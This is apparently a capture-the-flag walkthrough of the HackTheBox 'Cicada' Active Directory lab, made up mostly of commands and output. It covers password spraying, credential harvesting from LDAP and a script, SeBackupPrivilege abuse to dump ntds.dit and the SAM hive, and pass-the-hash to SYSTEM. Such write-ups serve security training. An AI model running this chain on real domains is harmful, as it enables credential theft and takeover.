Here is my notes on CICADA box from Hackthebox
CICADA: 10.129.96.74
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-24 21:17:35Z)
sudo impacket-GetUserSPNs 'cicada.htb/michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8' -dc-ip 10.129.96.74 -request
sudo impacket-GetUserSPNs 'cicada.htb/michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8' -dc-ip 10.129.96.74 -request
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
No entries found!
#NOPE.
sudo GetNPUsers.py -no-pass -dc-ip 10.129.96.74 -usersfile users.txt cicada.htb/
sudo GetNPUsers.py -no-pass -dc-ip 10.129.96.74 -usersfile users.txt cicada.htb/
/usr/local/bin/GetNPUsers.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.9.24.dev1+20210704.162046.29ad5792', 'GetNPUsers.py')
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User CICADA-DC$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User john.smoulder doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sarah.dantelia doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User michael.wrightson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User david.orelious doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User emily.oscars doesn't have UF_DONT_REQUIRE_PREAUTH set
No ASREPROASTING - NOPE !
135/tcp open msrpc Microsoft Windows RPC
rpcclient --user="" -N 10.129.96.74
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $>
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
ldapsearch -x -H ldap://10.129.96.74 -D '' -w '' -b "DC=cicada,DC=htb" "objectclass=user"
# extended LDIF
#
# LDAPv3
# base <DC=cicada,DC=htb> with scope subtree
# filter: objectclass=user
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090C78, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4f7c
# numResponses: 1
#LDAP v3 = NOPE
#Unless creds acquired, don't bother.
ldapsearch -H ldap://10.129.96.74 -x -W -D "michael.wrightson@cicada.htb" -b ""dc=cicada,dc=htb"" '(objectClass=person)'
ldapsearch -H ldap://10.129.96.74 -x -W -D "michael.wrightson@cicada.htb" -b "dc=cicada,dc=htb" '(objectClass=person)'
[SNIP]
# David Orelious, Users, cicada.htb
dn: CN=David Orelious,CN=Users,DC=cicada,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: David Orelious
sn: Orelious
description: Just in case I forget my password is aRt$Lp#7t*VQ!3
givenName: David
initials: D
distinguishedName: CN=David Orelious,CN=Users,DC=cicada,DC=htb
instanceType: 4
whenCreated: 20240314121729.0Z
whenChanged: 20240828172557.0Z
[SNIP]
crackmapexec smb 10.129.96.74 -u david.orelious -p 'aRt$Lp#7t*VQ!3'
SMB 10.129.96.74 445 CICADA-DC [*] Windows 10.0 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.96.74 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
#david.orelious credential discovered !
cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
445/tcp open microsoft-ds?
smbclient -N -L 10.129.96.74
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk
HR Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing
┌──(root㉿kali)-[/home/kali/BOXES/CICADA/10.129.96.74]
└─# crackmapexec smb 10.129.96.74 -u "guest" -p "" --shares
SMB 10.129.96.74 445 CICADA-DC [*] Windows 10.0 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.96.74 445 CICADA-DC [+] cicada.htb\guest:
SMB 10.129.96.74 445 CICADA-DC [+] Enumerated shares
SMB 10.129.96.74 445 CICADA-DC Share Permissions Remark
SMB 10.129.96.74 445 CICADA-DC ----- ----------- ------
SMB 10.129.96.74 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.96.74 445 CICADA-DC C$ Default share
SMB 10.129.96.74 445 CICADA-DC DEV
SMB 10.129.96.74 445 CICADA-DC HR READ
SMB 10.129.96.74 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.96.74 445 CICADA-DC NETLOGON Logon server share
SMB 10.129.96.74 445 CICADA-DC SYSVOL Logon server share
sudo lookupsid.py Guest@10.129.96.74 | tee usernames
grep SidTypeUser usernames | awk '{print $2}' | cut -d "\\" -f2 > users.txt
┌──(root㉿kali)-[/home/kali/BOXES/CICADA/10.129.96.74]
└─# ls
nmap nmapAutomator_10.129.96.74_All.txt recon usernames users.txt
┌──(root㉿kali)-[/home/kali/BOXES/CICADA/10.129.96.74]
└─# cat users.txt
Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
┌──(root㉿kali)-[/home/kali/BOXES/CICADA/10.129.96.74]
└─# smbclient \\\\10.129.96.74\\"HR" -U 'Guest%'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Mar 14 08:29:09 2024
.. D 0 Thu Mar 14 08:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 13:31:48 2024
4168447 blocks of size 4096. 438743 blocks available
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \> exit
┌──(root㉿kali)-[/home/kali/BOXES/CICADA/10.129.96.74]
└─# cat 'Notice from HR.txt'
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp
-Take that password and spread it to users.txt.
crackmapexec smb 10.129.96.74 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
SMB 10.129.96.74 445 CICADA-DC [*] Windows 10.0 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.96.74 445 CICADA-DC [-] cicada.htb\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.96.74 445 CICADA-DC [-] cicada.htb\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.96.74 445 CICADA-DC [-] cicada.htb\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.96.74 445 CICADA-DC [-] cicada.htb\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.96.74 445 CICADA-DC [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.96.74 445 CICADA-DC [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.96.74 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 #GOT IT !
crackmapexec smb 10.129.96.74 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares
SMB 10.129.96.74 445 CICADA-DC [*] Windows 10.0 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.96.74 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.129.96.74 445 CICADA-DC [+] Enumerated shares
SMB 10.129.96.74 445 CICADA-DC Share Permissions Remark
SMB 10.129.96.74 445 CICADA-DC ----- ----------- ------
SMB 10.129.96.74 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.96.74 445 CICADA-DC C$ Default share
SMB 10.129.96.74 445 CICADA-DC DEV
SMB 10.129.96.74 445 CICADA-DC HR READ
SMB 10.129.96.74 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.96.74 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.129.96.74 445 CICADA-DC SYSVOL READ Logon server share #NOPE, DON'T BOTHER, THAT IS A RABBIT HOLE !
#FROM LDAP Enumeration:
crackmapexec smb 10.129.96.74 -u david.orelious -p 'aRt$Lp#7t*VQ!3'
SMB 10.129.96.74 445 CICADA-DC [*] Windows 10.0 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.96.74 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
#david.orelious credential discovered !
cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
crackmapexec smb 10.129.96.74 -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
SMB 10.129.96.74 445 CICADA-DC [*] Windows 10.0 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.96.74 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.129.96.74 445 CICADA-DC [+] Enumerated shares
SMB 10.129.96.74 445 CICADA-DC Share Permissions Remark
SMB 10.129.96.74 445 CICADA-DC ----- ----------- ------
SMB 10.129.96.74 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.96.74 445 CICADA-DC C$ Default share
SMB 10.129.96.74 445 CICADA-DC DEV READ
SMB 10.129.96.74 445 CICADA-DC HR READ
SMB 10.129.96.74 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.96.74 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.129.96.74 445 CICADA-DC SYSVOL READ Logon server share
┌──(root㉿kali)-[/home/kali/BOXES/CICADA/10.129.96.74]
└─# cd DEV
┌──(root㉿kali)-[/home/…/BOXES/CICADA/10.129.96.74/DEV]
└─# smbclient \\\\10.129.96.74\\"DEV" -U 'david.orelious%aRt$Lp#7t*VQ!3'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Mar 14 08:31:39 2024
.. D 0 Thu Mar 14 08:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 13:28:22 2024
4168447 blocks of size 4096. 435411 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> exit
┌──(root㉿kali)-[/home/…/BOXES/CICADA/10.129.96.74/DEV]
└─# ls
Backup_script.ps1
┌──(root㉿kali)-[/home/…/BOXES/CICADA/10.129.96.74/DEV]
└─# cat Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
emily.oscars creds discovered !
emily.oscars:Q!3@Lp#M6b*7t*Vt
#According to LDAP:
[SNIP]
givenName: Emily
distinguishedName: CN=Emily Oscars,CN=Users,DC=cicada,DC=htb
instanceType: 4
whenCreated: 20240822212017.0Z
whenChanged: 20240829214805.0Z
displayName: Emily Oscars
uSNCreated: 90173
memberOf: CN=Remote Management Users,CN=Builtin,DC=cicada,DC=htb
memberOf: CN=Backup Operators,CN=Builtin,DC=cicada,DC=htb
uSNChanged: 135233
name: Emily Oscars
objectGUID:: R6f9/+eATEWMN2cCOkXyUg==
userAccountControl: 66048
[SNIP]
emily.oscars = USER-SHELL !
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
crackmapexec winrm 10.129.96.74 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
SMB 10.129.96.74 5985 CICADA-DC [*] Windows 10.0 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
HTTP 10.129.96.74 5985 CICADA-DC [*] http://10.129.96.74:5985/wsman
WINRM 10.129.96.74 5985 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> whoami
cicada\emily.oscars
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> hostname
CICADA-DC
USER-SHELL !
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> dir
Directory: C:\Users\emily.oscars.CICADA\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 10/24/2024 2:14 PM 34 user.txt
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> type user.txt
[REDIRECTED]
USER.TXT: [REDIRECTED]
PRIV ESC:
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> whoami /groups
Local Group Memberships *Backup Operators *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
┌──(root㉿kali)-[/home/…/BOXES/CICADA/10.129.96.74/Backup-PRIV]
└─# ls
script.txt SeBackupPrivilegeCmdLets.dll SeBackupPrivilegeUtils.dll
┌──(root㉿kali)-[/home/…/BOXES/CICADA/10.129.96.74/Backup-PRIV]
└─# cat script.txt
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup
┌──(root㉿kali)-[/home/…/BOXES/CICADA/10.129.96.74/Backup-PRIV]
└─# unix2dos script.txt
unix2dos: converting file script.txt to DOS format...
┌──(root㉿kali)-[/home/…/BOXES/CICADA/10.129.96.74/Backup-PRIV]
└─# evil-winrm -i 10.129.96.74 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> upload script.txt
upload SeBackupPrivilegeUtils.dll
upload SeBackupPrivilegeCmdLets.dll
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
diskshadow /s script.txt
Copy-FileSebackupPrivilege e:\Windows\NTDS\ntds.dit C:\Users\emily.oscars.CICADA\Documents\ntds.dit
reg save hklm\sam C:\Users\emily.oscars.CICADA\Documents\sam
reg save hklm\system C:\Users\emily.oscars.CICADA\Documents\system
download ntds.dit
download system
impacket-secretsdump -ntds ntds.dit -system system local
impacket-secretsdump -sam sam -system system -ntds ntds.dit LOCAL #For AD Domain users as Domain Administrator for just in case if local-admin didn't work.
secretsdump.py -ntds ntds.dit -system system local
/usr/local/bin/secretsdump.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.9.24.dev1+20210704.162046.29ad5792', 'secretsdump.py')
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: f954f575c626d6afe06c2b80cc2185e6
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
CICADA-DC$:1000:aad3b435b51404eeaad3b435b51404ee:188c2f3cb7592e18d1eae37991dee696:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3779000802a4bb402736bee52963f8ef:::
crackmapexec smb 10.129.96.74 -u administrator -H '2b87e7c93a3e8a0ea4a581937016f341'
SMB 10.129.96.74 445 CICADA-DC [*] Windows 10.0 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.96.74 445 CICADA-DC [+] cicada.htb\administrator:2b87e7c93a3e8a0ea4a581937016f341 (Pwn3d!)
psexec.py -hashes :2b87e7c93a3e8a0ea4a581937016f341 administrator@10.129.96.74
/usr/local/bin/psexec.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.9.24.dev1+20210704.162046.29ad5792', 'psexec.py')
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.129.96.74.....
[*] Found writable share ADMIN$
[*] Uploading file CbQpkYiC.exe
[*] Opening SVCManager on 10.129.96.74.....
[*] Creating service Payu on 10.129.96.74.....
[*] Starting service Payu.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.2700]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>hostname
CICADA-DC
SYSTEM-SHELL !
C:\Users>cd Administrator
C:\Users\Administrator>cd Desktop
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 1B60-8905
Directory of C:\Users\Administrator\Desktop
08/30/2024 10:06 AM <DIR> .
08/26/2024 01:10 PM <DIR> ..
10/24/2024 02:14 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 1,412,972,544 bytes free
C:\Users\Administrator\Desktop>type root.txt
[REDIRECTED]
ROOT.TXT: [REDIRECTED]
53446/tcp open msrpc Microsoft Windows RPC
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows